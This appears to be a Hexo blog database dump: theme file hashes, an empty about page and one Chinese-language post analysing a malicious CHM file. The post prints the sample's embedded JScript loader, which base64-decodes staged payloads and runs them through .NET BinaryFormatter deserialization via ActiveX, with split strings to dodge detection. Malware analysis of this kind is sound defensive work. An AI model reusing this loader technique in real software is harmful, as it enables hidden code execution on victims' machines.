9159fc22fa84a7b605dd15fe4104f01fe9c71147","modified":1739374576421},{"_id":"node_modules/hexo-theme-fluid/scripts/helpers/date.js","hash":"9bda6382f61b40a20c24af466fe10c8366ebb74c","modified":1739374576404},{"_id":"node_modules/hexo-theme-fluid/scripts/helpers/export-config.js","hash":"8e67b522c47aa250860e3fe2c733f1f958a506c0","modified":1739374576404},{"_id":"node_modules/hexo-theme-fluid/scripts/helpers/import.js","hash":"ca53e8dbf7d44cfd372cfa79ac60f35a7d5b0076","modified":1739374576421},{"_id":"node_modules/hexo-theme-fluid/scripts/helpers/injects.js","hash":"1ad2ae6b11bd8806ee7dd6eb7140d8b54a95d613","modified":1739374576421},{"_id":"node_modules/hexo-theme-fluid/scripts/helpers/engine.js","hash":"d3a231d106795ce99cb0bc77eb65f9ae44515933","modified":1739374576404},{"_id":"node_modules/hexo-theme-fluid/scripts/helpers/page.js","hash":"4607607445233b3029ef20ed5e91de0da0a7f9c5","modified":1739374576422},{"_id":"node_modules/hexo-theme-fluid/scripts/helpers/scope.js","hash":"d41d9d658fcb54964b388598e996747aadb85b0f","modified":1739374576422},{"_id":"node_modules/hexo-theme-fluid/scripts/helpers/url.js","hash":"2a6a8288176d0e0f6ec008056bf2745a86e8943e","modified":1739374576423},{"_id":"node_modules/hexo-theme-fluid/scripts/helpers/wordcount.js","hash":"4543b8954c5c2ca91191cc0d53cf071b3f26faaa","modified":1739374576423},{"_id":"node_modules/hexo-theme-fluid/scripts/tags/button.js","hash":"3eb43a8cdea0a64576ad6b31b4df6c2bf5698d4c","modified":1739374576403},{"_id":"node_modules/hexo-theme-fluid/scripts/helpers/utils.js","hash":"226f99b465ff513de075a8e78b321d6cb62592ca","modified":1739374576423},{"_id":"node_modules/hexo-theme-fluid/scripts/tags/checkbox.js","hash":"4938610c3543a921a341bc074626d511cb1a4b45","modified":1739374576403},{"_id":"node_modules/hexo-theme-fluid/scripts/tags/label.js","hash":"f05a6d32cca79535b22907dc03edb9d3fa2d8176","modified":1739374576422},{"_id":"node_modules/hexo-theme-fluid/scripts/tags/group-image.js","hash":"4aeebb797026f1df25646a5d69f7fde79b1bcd26","modified":1739374576421},{"_id":"node_modules/hexo-theme-fluid/scripts/tags/note.js","hash":"e3b456a079e5dc0032473b516c865b20f83d2c26","modified":1739374576422},{"_id":"node_modules/hexo-theme-fluid/scripts/tags/mermaid.js","hash":"75160561e1ef3603b6d2ad2938464ab1cb77fd38","modified":1739374576422},{"_id":"node_modules/hexo-theme-fluid/scripts/utils/compare-versions.js","hash":"dbbc928c914fc2bd242cd66aa0c45971aec13a5d","modified":1739374576403},{"_id":"node_modules/hexo-theme-fluid/scripts/utils/url-join.js","hash":"718aab5e7b2059a06b093ca738de420d9afa44ba","modified":1739374576423},{"_id":"node_modules/hexo-theme-fluid/scripts/utils/object.js","hash":"33b57e4decdc5e75c518859f168c8ba80b2c665b","modified":1739374576422},{"_id":"node_modules/hexo-theme-fluid/scripts/utils/resolve.js","hash":"8c4a8b62aa8608f12f1e9046231dff04859dc3e9","modified":1739374576422},{"_id":"node_modules/hexo-theme-fluid/scripts/events/.DS_Store","hash":"80308812974d7cb7e001cd8f64ff9fced30ff139","modified":1739374576328},{"_id":"node_modules/hexo-theme-fluid/scripts/utils/.DS_Store","hash":"df2fbeb1400acda0909a32c1cf6bf492f1121e07","modified":1739374576328},{"_id":"node_modules/hexo-theme-fluid/source/css/gitalk.css","hash":"a57b3cc8e04a0a4a27aefa07facf5b5e7bca0e76","modified":1739374576340},{"_id":"node_modules/hexo-theme-fluid/source/css/main.styl","hash":"855ae5fe229c51afa57f7645f6997a27a705d7e4","modified":1739374576677},{"_id":"node_modules/hexo-theme-fluid/source/css/highlight.styl","hash":"a9efc52a646a9e585439c768557e3e3c9e3326dc","modified":1739374576674},{"_id":"node_modules/hexo-theme-fluid/source/img/.DS_Store","hash":"df2fbeb1400acda0909a32c1cf6bf492f1121e07","modified":1739374576329},{"_id":"node_modules/hexo-theme-fluid/source/css/highlight-dark.styl","hash":"45695ef75c31a4aa57324dd408b7e2327a337018","modified":1739374576674},{"_id":"node_modules/hexo-theme-fluid/source/img/avatar.png","hash":"fe739a158cc128f70f780eb5fa96f388b81d478f","modified":1739374576433},{"_id":"node_modules/hexo-theme-fluid/source/img/fluid.png","hash":"64b215db2cb3af98fe639e94537cb5209f959c78","modified":1739374576666},{"_id":"node_modules/hexo-theme-fluid/source/js/boot.js","hash":"38bd26c6b7acdafda86dda3560e6a3ca488d3c76","modified":1739374576403},{"_id":"node_modules/hexo-theme-fluid/source/js/color-schema.js","hash":"76a198f8721352ebeaf5b2ef2f4db00612da4796","modified":1739374576403},{"_id":"node_modules/hexo-theme-fluid/source/js/leancloud.js","hash":"eff77c7a5c399fcaefda48884980571e15243fc9","modified":1739374576422},{"_id":"node_modules/hexo-theme-fluid/source/img/loading.gif","hash":"2d2fc0f947940f98c21afafef39ecf226a2e8d55","modified":1739374576403},{"_id":"node_modules/hexo-theme-fluid/source/img/police_beian.png","hash":"90efded6baa2dde599a9d6b1387973e8e64923ea","modified":1739374576666},{"_id":"node_modules/hexo-theme-fluid/source/js/local-search.js","hash":"b9945f76f8682f3ec32edfb285b26eb559f7b7e8","modified":1739374576422},{"_id":"node_modules/hexo-theme-fluid/source/js/events.js","hash":"89e3561488a618ed0caeb9edf18e441978e29c25","modified":1739374576404},{"_id":"node_modules/hexo-theme-fluid/layout/_partials/comments/changyan.ejs","hash":"c9b2d68ed3d375f1953e7007307d2a3f75ed6249","modified":1739374576346},{"_id":"node_modules/hexo-theme-fluid/source/js/img-lazyload.js","hash":"cbdeca434ec4da51f488c821d51b4d23c73294af","modified":1739374576421},{"_id":"node_modules/hexo-theme-fluid/source/js/plugins.js","hash":"c34916291e392a774ff3e85c55badb83e8661297","modified":1739374576423},{"_id":"node_modules/hexo-theme-fluid/source/js/utils.js","hash":"b82e7c289a66dfd36064470fd41c0e96fc598b43","modified":1739374576423},{"_id":"node_modules/hexo-theme-fluid/layout/_partials/comments/cusdis.ejs","hash":"5f9dc012be27040bbe874d0c093c0d53958cc987","modified":1739374576346},{"_id":"node_modules/hexo-theme-fluid/layout/_partials/comments/disqus.ejs","hash":"aab4a4d24c55231a37db308ae94414319cecdd9b","modified":1739374576347},{"_id":"node_modules/hexo-theme-fluid/source/xml/local-search.xml","hash":"8c96ba6a064705602ce28d096fd7dd9069630a55","modified":1739374576678},{"_id":"node_modules/hexo-theme-fluid/layout/_partials/comments/discuss.ejs","hash":"98d065b58ce06b7d18bff3c974e96fa0f34ae03a","modified":1739374576346},{"_id":"node_modules/hexo-theme-fluid/layout/_partials/comments/gitalk.ejs","hash":"843bc141a4545eb20d1c92fb63c85d459b4271ec","modified":1739374576347},{"_id":"node_modules/hexo-theme-fluid/layout/_partials/comments/giscus.ejs","hash":"95f8b866b158eff9352c381c243b332a155a5110","modified":1739374576347},{"_id":"node_modules/hexo-theme-fluid/layout/_partials/comments/twikoo.ejs","hash":"d84bcb5ccd78470a60c067fc914ac0ac67ac8777","modified":1739374576399},{"_id":"node_modules/hexo-theme-fluid/layout/_partials/comments/valine.ejs","hash":"19ba937553dddd317f827d682661a1066a7b1f30","modified":1739374576399},{"_id":"node_modules/hexo-theme-fluid/layout/_partials/comments/utterances.ejs","hash":"c7ccf7f28308334a6da6f5425b141a24b5eca0e2","modified":1739374576399},{"_id":"node_modules/hexo-theme-fluid/layout/_partials/comments/remark42.ejs","hash":"d4e9532feeb02aed61bd15eda536b5b631454dac","modified":1739374576387},{"_id":"node_modules/hexo-theme-fluid/layout/_partials/comments/livere.ejs","hash":"2264758fed57542a7389c7aa9f00f1aefa17eb87","modified":1739374576348},{"_id":"node_modules/hexo-theme-fluid/layout/_partials/comments/waline.ejs","hash":"12727da7cf3ac83443270f550be4d1c06135b52b","modified":1739374576399},{"_id":"node_modules/hexo-theme-fluid/layout/_partials/footer/statistics.ejs","hash":"454d8dd4c39f9494ebeb03ca0746f5bc122af76a","modified":1739374576399},{"_id":"node_modules/hexo-theme-fluid/layout/_partials/header/navigation.ejs","hash":"870db75e4e403a840c4463dfeed2c9114846e7cc","modified":1739374576386},{"_id":"node_modules/hexo-theme-fluid/layout/_partials/header/banner.ejs","hash":"e07757b59e7b89eea213d0e595cb5932f812fd32","modified":1739374576341},{"_id":"node_modules/hexo-theme-fluid/layout/_partials/footer/beian.ejs","hash":"4fb9b5dd3f3e41a586d6af44e5069afe7c81fff2","modified":1739374576341},{"_id":"node_modules/hexo-theme-fluid/layout/_partials/plugins/analytics.ejs","hash":"4f68c80bd1395e2f6d11e373116e54de11cb62e8","modified":1739374576340},{"_id":"node_modules/hexo-theme-fluid/layout/_partials/plugins/anchorjs.ejs","hash":"40181442d3a2b8734783a0ad7caf2d2522e3f2ab","modified":1739374576341},{"_id":"node_modules/hexo-theme-fluid/layout/_partials/plugins/code-widget.ejs","hash":"3a505cba37942badf62a56bbb8b605b72af330aa","modified":1739374576346},{"_id":"node_modules/hexo-theme-fluid/layout/_partials/plugins/encrypt.ejs","hash":"0fff24cf5bf99fbe5c56c292e2eac4a89bf29db4","modified":1739374576347},{"_id":"node_modules/hexo-theme-fluid/layout/_partials/plugins/fancybox.ejs","hash":"9d1ea2a46b8c8ad8c168594d578f40764818ef13","modified":1739374576347},{"_id":"node_modules/hexo-theme-fluid/layout/_partials/plugins/highlight.ejs","hash":"7529dd215b09d3557804333942377b9e20fa554e","modified":1739374576348},{"_id":"node_modules/hexo-theme-fluid/layout/_partials/plugins/math.ejs","hash":"dcbf9a381ee76f2f1f75fcbc22c50a502ec85023","modified":1739374576386},{"_id":"node_modules/hexo-theme-fluid/layout/_partials/plugins/nprogress.ejs","hash":"4c2d39ce816b8a6dcd6b53113c8695f8bd650a23","modified":1739374576386},{"_id":"node_modules/hexo-theme-fluid/layout/_partials/plugins/typed.ejs","hash":"f345374885cd6a334f09a11f59c443b5d577c06c","modified":1739374576399},{"_id":"node_modules/hexo-theme-fluid/layout/_partials/plugins/mermaid.ejs","hash":"03ac02762f801970d1c4e73d6ec8d4c503780e50","modified":1739374576386},{"_id":"node_modules/hexo-theme-fluid/layout/_partials/post/category-bar.ejs","hash":"8772bce97ed297e7a88523f4e939ed6436c22f87","modified":1739374576345},{"_id":"node_modules/hexo-theme-fluid/layout/_partials/post/copyright.ejs","hash":"529f3069742b3d338c769ba2d836e7f3c342a09d","modified":1739374576346},{"_id":"node_modules/hexo-theme-fluid/layout/_partials/post/meta-bottom.ejs","hash":"375974ec017696e294dc12469fb0ae257800dc2d","modified":1739374576386},{"_id":"node_modules/hexo-theme-fluid/layout/_partials/post/sidebar-left.ejs","hash":"9992c99b3eb728ad195970e1b84d665f2c8691c4","modified":1739374576398},{"_id":"node_modules/hexo-theme-fluid/scripts/events/lib/compatible-configs.js","hash":"ef474d1fa5bbafc52619ced0f9dc7eaf2affb363","modified":1739374576404},{"_id":"node_modules/hexo-theme-fluid/layout/_partials/post/meta-top.ejs","hash":"ce6e9f578f4faa45840abddf8f46af3f4b69c177","modified":1739374576386},{"_id":"node_modules/hexo-theme-fluid/scripts/events/lib/hello.js","hash":"44c5eb97b98813a07c659d6afedd17fad63b1821","modified":1739374576421},{"_id":"node_modules/hexo-theme-fluid/scripts/events/lib/footnote.js","hash":"b2f61b91fffb17d11ad56811f07d52d23f012741","modified":1739374576421},{"_id":"node_modules/hexo-theme-fluid/scripts/events/lib/highlight.js","hash":"8d3ae1ec6660fbb0e563bc08c2f8deefde1f3bf6","modified":1739374576421},{"_id":"node_modules/hexo-theme-fluid/scripts/events/lib/injects.js","hash":"5ae4b07204683e54b5a1b74e931702bbce2ac23e","modified":1739374576421},{"_id":"node_modules/hexo-theme-fluid/layout/_partials/post/sidebar-right.ejs","hash":"d5fcc9b60e02f869a29a8c17a16a6028ecc1e6d8","modified":1739374576398},{"_id":"node_modules/hexo-theme-fluid/scripts/events/lib/merge-configs.js","hash":"7c944c43b2ece5dd84859bd9d1fe955d13427387","modified":1739374576422},{"_id":"node_modules/hexo-theme-fluid/scripts/events/lib/lazyload.js","hash":"9ba0d4bc224e22af8a5a48d6ff13e5a0fcfee2a4","modified":1739374576422},{"_id":"node_modules/hexo-theme-fluid/layout/_partials/post/toc.ejs","hash":"635a89060fbf72eeda066fc4bd0a97462f069417","modified":1739374576399},{"_id":"node_modules/hexo-theme-fluid/source/css/_mixins/base.styl","hash":"542e306ee9494e8a78e44d6d7d409605d94caeb3","modified":1739374576670},{"_id":"node_modules/hexo-theme-fluid/source/css/_functions/base.styl","hash":"2e46f3f4e2c9fe34c1ff1c598738fc7349ae8188","modified":1739374576670},{"_id":"node_modules/hexo-theme-fluid/source/css/_pages/pages.styl","hash":"b8e887bc7fb3b765a1f8ec9448eff8603a41984f","modified":1739374576677},{"_id":"node_modules/hexo-theme-fluid/source/css/_variables/base.styl","hash":"4ed5f0ae105ef4c7dd92eaf652ceda176c38e502","modified":1739374576671},{"_id":"node_modules/hexo-theme-fluid/source/css/_pages/_base/base.styl","hash":"643284c567665f96915f0b64e59934dda315f74d","modified":1739374576671},{"_id":"node_modules/hexo-theme-fluid/source/css/_pages/_about/about.styl","hash":"97fe42516ea531fdad771489b68aa8b2a7f6ae46","modified":1739374576666},{"_id":"node_modules/hexo-theme-fluid/source/css/_pages/_base/color-schema.styl","hash":"e413212e5a667d5b8299c4d2a39c4dfa1378d119","modified":1739374576673},{"_id":"node_modules/hexo-theme-fluid/source/css/_pages/_base/print.styl","hash":"166afbc596ea4b552bad7290ec372d25ec34db7b","modified":1739374576678},{"_id":"node_modules/hexo-theme-fluid/source/css/_pages/_base/inline.styl","hash":"411a3fa3f924a87e00ff04d18b5c83283b049a4d","modified":1739374576676},{"_id":"node_modules/hexo-theme-fluid/source/css/_pages/_category/category-chain.styl","hash":"0cdf7ef50dfd0669d3b257821384ff31cd81b7c9","modified":1739374576672},{"_id":"node_modules/hexo-theme-fluid/source/css/_pages/_base/keyframes.styl","hash":"94065ea50f5bef7566d184f2422f6ac20866ba22","modified":1739374576676},{"_id":"node_modules/hexo-theme-fluid/source/css/_pages/_links/links.styl","hash":"5c7f2044e3f1da05a3229537c06bd879836f8d6e","modified":1739374576677},{"_id":"node_modules/hexo-theme-fluid/source/css/_pages/_category/category-list.styl","hash":"7edfe1b571ecca7d08f5f4dbcf76f4ffdcfbf0b5","modified":1739374576672},{"_id":"node_modules/hexo-theme-fluid/source/css/_pages/_archive/archive.styl","hash":"c475e6681546d30350eaed11f23081ecae80c375","modified":1739374576667},{"_id":"node_modules/hexo-theme-fluid/source/css/_pages/_category/category-bar.styl","hash":"cc6df43fef6bb3efecbfdd8b9e467424a1dea581","modified":1739374576672},{"_id":"node_modules/hexo-theme-fluid/source/css/_pages/_post/highlight.styl","hash":"4df764d298fe556e501db4afc2b05686fe6ebcfb","modified":1739374576674},{"_id":"node_modules/hexo-theme-fluid/source/css/_pages/_post/markdown.styl","hash":"1e3d3a82721e7c10bcfcecec6d81cf2979039452","modified":1739374576677},{"_id":"node_modules/hexo-theme-fluid/source/css/_pages/_post/post-tag.styl","hash":"27f70062415ccf66a9b6f4952db124fc1471fda5","modified":1739374576677},{"_id":"node_modules/hexo-theme-fluid/source/css/_pages/_index/index.styl","hash":"0acbd71633bcc7191672ea4e1b2277bea350d73b","modified":1739374576675},{"_id":"node_modules/hexo-theme-fluid/source/css/_pages/_post/post-page.styl","hash":"ecf3488566b374d564ae985c61e08562ba908023","modified":1739374576677},{"_id":"node_modules/hexo-theme-fluid/source/css/_pages/_base/_widget/anchorjs.styl","hash":"e0cebda4a6f499aff75e71417d88caa7ceb13b94","modified":1739374576667},{"_id":"node_modules/hexo-theme-fluid/source/css/_pages/_tag/tags.styl","hash":"65bfc01c76abc927fa1a23bf2422892b0d566c3f","modified":1739374576678},{"_id":"node_modules/hexo-theme-fluid/source/css/_pages/_post/comment.styl","hash":"780f3788e7357bcd3f3262d781cb91bb53976a93","modified":1739374576673},{"_id":"node_modules/hexo-theme-fluid/source/css/_pages/_base/_widget/banner.styl","hash":"7a0bd629bc234fc75e3cc8e3715ffada92f09e73","modified":1739374576667},{"_id":"node_modules/hexo-theme-fluid/source/css/_pages/_base/_widget/board.styl","hash":"4397037fc3f0033dbe546c33cd9dbdabd8cb1632","modified":1739374576672},{"_id":"node_modules/hexo-theme-fluid/source/css/_pages/_base/_widget/code-widget.styl","hash":"b66ab013f0f37d724a149b85b3c7432afcf460ad","modified":1739374576673},{"_id":"node_modules/hexo-theme-fluid/source/css/_pages/_base/_widget/footer.styl","hash":"2caaca71dd1ff63d583099ed817677dd267b457e","modified":1739374576674},{"_id":"node_modules/hexo-theme-fluid/source/css/_pages/_base/_widget/modal.styl","hash":"adf6c1e5c8e1fb41c77ce6e2258001df61245aa2","modified":1739374576677},{"_id":"node_modules/hexo-theme-fluid/source/css/_pages/_base/_widget/copyright.styl","hash":"26f71a9cd60d96bb0cb5bbdf58150b8e524d9707","modified":1739374576673},{"_id":"node_modules/hexo-theme-fluid/source/css/_pages/_base/_widget/noscript.styl","hash":"0cf2f2bb44f456150d428016675d5876a9d2e2aa","modified":1739374576677},{"_id":"node_modules/hexo-theme-fluid/source/css/_pages/_base/_widget/footnote.styl","hash":"ae9289cc89649af2042907f8a003303b987f3404","modified":1739374576674},{"_id":"node_modules/hexo-theme-fluid/source/css/_pages/_base/_widget/header.styl","hash":"c4459248c66ea1326feed021179b847ae91d465f","modified":1739374576674},{"_id":"node_modules/hexo-theme-fluid/source/css/_pages/_base/_widget/ngrogress.styl","hash":"5d225357b4a58d46118e6616377168336ed44cb2","modified":1739374576677},{"_id":"node_modules/hexo-theme-fluid/source/css/_pages/_base/_widget/qrcode.styl","hash":"78704a94c0436097abfb0e0a57abeb3429c749b7","modified":1739374576678},{"_id":"node_modules/hexo-theme-fluid/source/css/_pages/_base/_widget/pagination.styl","hash":"8bb1b68e5f3552cb48c2ffa31edbc53646a8fb4c","modified":1739374576677},{"_id":"node_modules/hexo-theme-fluid/source/css/_pages/_base/_widget/toc.styl","hash":"9e7452aa2372153f25d7a4675c9d36d281a65d24","modified":1739374576678},{"_id":"node_modules/hexo-theme-fluid/source/css/_pages/_base/_widget/scroll-btn.styl","hash":"f0e429a27fa8a7658fcbddbb4d4dbe4afa12499a","modified":1739374576678},{"_id":"node_modules/hexo-theme-fluid/source/css/_pages/_base/_widget/search.styl","hash":"10f7e91a91e681fb9fe46f9df7707b9ef78707c8","modified":1739374576678},{"_id":"node_modules/hexo-theme-fluid/source/img/default.png","hash":"167a12978d80371cf578c8a2e45c24a2eb25b6fb","modified":1739374576663}],"Category":[],"Data":[],"Page":[{"title":"about","layout":"about","_content":"","source":"about/index.md","raw":"---\ntitle: about\nlayout: about\n---","date":"2025-02-12T15:31:57.129Z","updated":"2025-02-12T15:31:51.313Z","path":"about/index.html","comments":1,"_id":"cm722r5bj00007dp86szd3zfn","content":"","site":{"data":{}},"excerpt":"","more":""}],"Post":[{"title":"chm样本分析","date":"2023-10-30T09:34:05.000Z","_content":"\n# chm样本分析\n\n如果说上一篇文章是认真写的，那这一篇百分百属于，，摸鱼的内容了。\n\n单纯的记录一下chm无文件攻击（吐槽 这样本是无文件转有文件攻击了X）如何分析吧\n\n由于chm使用了 [LZX](https://en.wikipedia.org/wiki/LZX) 进行数据压缩，所以我们可以用7zip来看看里面都有什么（灵车\n\n![](./../img/image-20231030174029125.png)\n\n里面似乎有个html，打开后发现是js脚本。\n\n![](./../img/image-20231030174130475.png)\n\n```js\n<script>\nfunction Base64ToStream(b,l) {\n\tvar enc = new ActiveXObject(\"System.Text.ASCII\"+\"Encoding\");\n\tvar length = enc.GetByteCount_2(b);\n\tvar ba = enc.GetBytes_4(b);\n\tvar transform = new ActiveXObject(\"System.Security.Cryptography.FromBase\"+\"64Transform\");\n\tba = transform.TransformFinalBlock(ba, 0, length);\n\tvar ms = new ActiveXObject(\"System.IO.Memory\"+\"Stream\");\n\tms.Write(ba, 0, l);\n\tms.Position = 0;\n\treturn ms;\n}\ntry {\n\tvar shell = new ActiveXObject('WScript.Shell');\n\tver = 'v4.0.30319';\n\t\n\ttry {\n\t\t//throw 1;\n\t\tshell.RegRead('HKLM\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\v4.0.30319\\\\');\n\t} catch(e) { \n\t\tstage_1 = stage_3;\n\t\tstage_1_len = stage_3_len;\n\t\tver = 'v2.0.50727';\n\t}\n\t//shell.Popup(\"\", 0, ver, 64);\n\tshell.Environment('Process')('COMPLUS_Version') = ver;\n\n\tvar ms_1 = Base64ToStream(stage_1, stage_1_len);\n\tvar fmt_1 = new ActiveXObject('System.Runtime.Serialization.Formatters.Bi'+'nary.BinaryFormatter');\n\tfmt_1.Deserialize_2(ms_1);\n} catch (e) {\n\ttry{\t\t\n\t\tvar ms_2 = Base64ToStream(stage_2, stage_2_len);\n\t\tvar fmt_2 = new ActiveXObject('System.Runtime.Serialization.Formatters.Bi'+'nary.BinaryFormatter');\n\t\tfmt_2.Deserialize_2(ms_2);\n\t}catch (e2){}\n}\n})();\n</script>\n```\n\n剩下内容与[VBE样本分析](https://blog.lenxy.net/2023/10/30/Analysis-of-vbe-virus/)一致了，衍生物也是一样的。只不过白加黑我实在解不明白了，放弃挣扎。\n","source":"_posts/Analysis-of-chm-virus.md","raw":"---\ntitle: chm样本分析\ndate: 2023-10-30 17:34:05\ntags: 病毒分析\n---\n\n# chm样本分析\n\n如果说上一篇文章是认真写的，那这一篇百分百属于，，摸鱼的内容了。\n\n单纯的记录一下chm无文件攻击（吐槽 这样本是无文件转有文件攻击了X）如何分析吧\n\n由于chm使用了 [LZX](https://en.wikipedia.org/wiki/LZX) 进行数据压缩，所以我们可以用7zip来看看里面都有什么（灵车\n\n![](./../img/image-20231030174029125.png)\n\n里面似乎有个html，打开后发现是js脚本。\n\n![](./../img/image-20231030174130475.png)\n\n```js\n<script>\nfunction Base64ToStream(b,l) {\n\tvar enc = new ActiveXObject(\"System.Text.ASCII\"+\"Encoding\");\n\tvar length = enc.GetByteCount_2(b);\n\tvar ba = enc.GetBytes_4(b);\n\tvar transform = new ActiveXObject(\"System.Security.Cryptography.FromBase\"+\"64Transform\");\n\tba = transform.TransformFinalBlock(ba, 0, length);\n\tvar ms = new ActiveXObject(\"System.IO.Memory\"+\"Stream\");\n\tms.Write(ba, 0, l);\n\tms.Position = 0;\n\treturn ms;\n}\ntry {\n\tvar shell = new ActiveXObject('WScript.Shell');\n\tver = 'v4.0.30319';\n\t\n\ttry {\n\t\t//throw 1;\n\t\tshell.RegRead('HKLM\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\v4.0.30319\\\\');\n\t} catch(e) { \n\t\tstage_1 = stage_3;\n\t\tstage_1_len = stage_3_len;\n\t\tver = 'v2.0.50727';\n\t}\n\t//shell.Popup(\"\", 0, ver, 64);\n\tshell.Environment('Process')('COMPLUS_Version') = ver;\n\n\tvar ms_1 = Base64ToStream(stage_1, stage_1_len);\n\tvar fmt_1 = new ActiveXObject('System.Runtime.Serialization.Formatters.Bi'+'nary.BinaryFormatter');\n\tfmt_1.Deserialize_2(ms_1);\n} catch (e) {\n\ttry{\t\t\n\t\tvar ms_2 = Base64ToStream(stage_2, stage_2_len);\n\t\tvar fmt_2 = new ActiveXObject('System.Runtime.Serialization.Formatters.Bi'+'nary.BinaryFormatter');\n\t\tfmt_2.Deserialize_2(ms_2);\n\t}catch (e2){}\n}\n})();\n</script>\n```\n\n剩下内容与[VBE样本分析](https://blog.lenxy.net/2023/10/30/Analysis-of-vbe-virus/)一致了，衍生物也是一样的。只不过白加黑我实在解不明白了，放弃挣扎。\n","slug":"Analysis-of-chm-virus","published":1,"updated":"2025-02-12T15:31:51.312Z","comments":1,"layout":"post","photos":[],"link":"","_id":"cm722r5bk00017dp8djox8qia","content":"<h1 id=\"chm样本分析\"><a href=\"#chm样本分析\" class=\"headerlink\" title=\"chm样本分析\"></a>chm样本分析</h1><p>如果说上一篇文章是认真写的，那这一篇百分百属于，，摸鱼的内容了。</p>\n<p>单纯的记录一下chm无文件攻击（吐槽 这样本是无文件转有文件攻击了X）如何分析吧</p>\n<p>由于chm使用了 <a href=\"https://en.wikipedia.org/wiki/LZX\">LZX</a> 进行数据压缩，所以我们可以用7zip来看看里面都有什么（灵车</p>\n<p><img src=\"/./../img/image-20231030174029125.png\"></p>\n<p>里面似乎有个html，打开后发现是js脚本。</p>\n<p><img src=\"/./../img/image-20231030174130475.png\"></p>\n<figure class=\"highlight js\"><table><tr><td class=\"gutter\"><pre><span class=\"line\">1</span><br><span class=\"line\">2</span><br><span class=\"line\">3</span><br><span class=\"line\">4</span><br><span class=\"line\">5</span><br><span class=\"line\">6</span><br><span class=\"line\">7</span><br><span class=\"line\">8</span><br><span class=\"line\">9</span><br><span class=\"line\">10</span><br><span class=\"line\">11</span><br><span class=\"line\">12</span><br><span class=\"line\">13</span><br><span class=\"line\">14</span><br><span class=\"line\">15</span><br><span class=\"line\">16</span><br><span class=\"line\">17</span><br><span class=\"line\">18</span><br><span class=\"line\">19</span><br><span class=\"line\">20</span><br><span class=\"line\">21</span><br><span class=\"line\">22</span><br><span class=\"line\">23</span><br><span class=\"line\">24</span><br><span class=\"line\">25</span><br><span class=\"line\">26</span><br><span class=\"line\">27</span><br><span class=\"line\">28</span><br><span class=\"line\">29</span><br><span class=\"line\">30</span><br><span class=\"line\">31</span><br><span class=\"line\">32</span><br><span class=\"line\">33</span><br><span class=\"line\">34</span><br><span class=\"line\">35</span><br><span class=\"line\">36</span><br><span class=\"line\">37</span><br><span class=\"line\">38</span><br><span class=\"line\">39</span><br></pre></td><td class=\"code\"><pre><code class=\"hljs js\">&lt;script&gt;<br><span class=\"hljs-keyword\">function</span> <span class=\"hljs-title function_\">Base64ToStream</span>(<span class=\"hljs-params\">b,l</span>) &#123;<br>\t<span class=\"hljs-keyword\">var</span> enc = <span class=\"hljs-keyword\">new</span> <span class=\"hljs-title class_\">ActiveXObject</span>(<span class=\"hljs-string\">&quot;System.Text.ASCII&quot;</span>+<span class=\"hljs-string\">&quot;Encoding&quot;</span>);<br>\t<span class=\"hljs-keyword\">var</span> length = enc.<span class=\"hljs-title class_\">GetByteCount</span>_2(b);<br>\t<span class=\"hljs-keyword\">var</span> ba = enc.<span class=\"hljs-title class_\">GetBytes</span>_4(b);<br>\t<span class=\"hljs-keyword\">var</span> transform = <span class=\"hljs-keyword\">new</span> <span class=\"hljs-title class_\">ActiveXObject</span>(<span class=\"hljs-string\">&quot;System.Security.Cryptography.FromBase&quot;</span>+<span class=\"hljs-string\">&quot;64Transform&quot;</span>);<br>\tba = transform.<span class=\"hljs-title class_\">TransformFinalBlock</span>(ba, <span class=\"hljs-number\">0</span>, length);<br>\t<span class=\"hljs-keyword\">var</span> ms = <span class=\"hljs-keyword\">new</span> <span class=\"hljs-title class_\">ActiveXObject</span>(<span class=\"hljs-string\">&quot;System.IO.Memory&quot;</span>+<span class=\"hljs-string\">&quot;Stream&quot;</span>);<br>\tms.<span class=\"hljs-title class_\">Write</span>(ba, <span class=\"hljs-number\">0</span>, l);<br>\tms.<span class=\"hljs-property\">Position</span> = <span class=\"hljs-number\">0</span>;<br>\t<span class=\"hljs-keyword\">return</span> ms;<br>&#125;<br><span class=\"hljs-keyword\">try</span> &#123;<br>\t<span class=\"hljs-keyword\">var</span> shell = <span class=\"hljs-keyword\">new</span> <span class=\"hljs-title class_\">ActiveXObject</span>(<span class=\"hljs-string\">&#x27;WScript.Shell&#x27;</span>);<br>\tver = <span class=\"hljs-string\">&#x27;v4.0.30319&#x27;</span>;<br>\t<br>\t<span class=\"hljs-keyword\">try</span> &#123;<br>\t\t<span class=\"hljs-comment\">//throw 1;</span><br>\t\tshell.<span class=\"hljs-title class_\">RegRead</span>(<span class=\"hljs-string\">&#x27;HKLM\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\v4.0.30319\\\\&#x27;</span>);<br>\t&#125; <span class=\"hljs-keyword\">catch</span>(e) &#123; <br>\t\tstage_1 = stage_3;<br>\t\tstage_1_len = stage_3_len;<br>\t\tver = <span class=\"hljs-string\">&#x27;v2.0.50727&#x27;</span>;<br>\t&#125;<br>\t<span class=\"hljs-comment\">//shell.Popup(&quot;&quot;, 0, ver, 64);</span><br>\tshell.<span class=\"hljs-title class_\">Environment</span>(<span class=\"hljs-string\">&#x27;Process&#x27;</span>)(<span class=\"hljs-string\">&#x27;COMPLUS_Version&#x27;</span>) = ver;<br><br>\t<span class=\"hljs-keyword\">var</span> ms_1 = <span class=\"hljs-title class_\">Base64ToStream</span>(stage_1, stage_1_len);<br>\t<span class=\"hljs-keyword\">var</span> fmt_1 = <span class=\"hljs-keyword\">new</span> <span class=\"hljs-title class_\">ActiveXObject</span>(<span class=\"hljs-string\">&#x27;System.Runtime.Serialization.Formatters.Bi&#x27;</span>+<span class=\"hljs-string\">&#x27;nary.BinaryFormatter&#x27;</span>);<br>\tfmt_1.<span class=\"hljs-title class_\">Deserialize</span>_2(ms_1);<br>&#125; <span class=\"hljs-keyword\">catch</span> (e) &#123;<br>\t<span class=\"hljs-keyword\">try</span>&#123;\t\t<br>\t\t<span class=\"hljs-keyword\">var</span> ms_2 = <span class=\"hljs-title class_\">Base64ToStream</span>(stage_2, stage_2_len);<br>\t\t<span class=\"hljs-keyword\">var</span> fmt_2 = <span class=\"hljs-keyword\">new</span> <span class=\"hljs-title class_\">ActiveXObject</span>(<span class=\"hljs-string\">&#x27;System.Runtime.Serialization.Formatters.Bi&#x27;</span>+<span class=\"hljs-string\">&#x27;nary.BinaryFormatter&#x27;</span>);<br>\t\tfmt_2.<span class=\"hljs-title 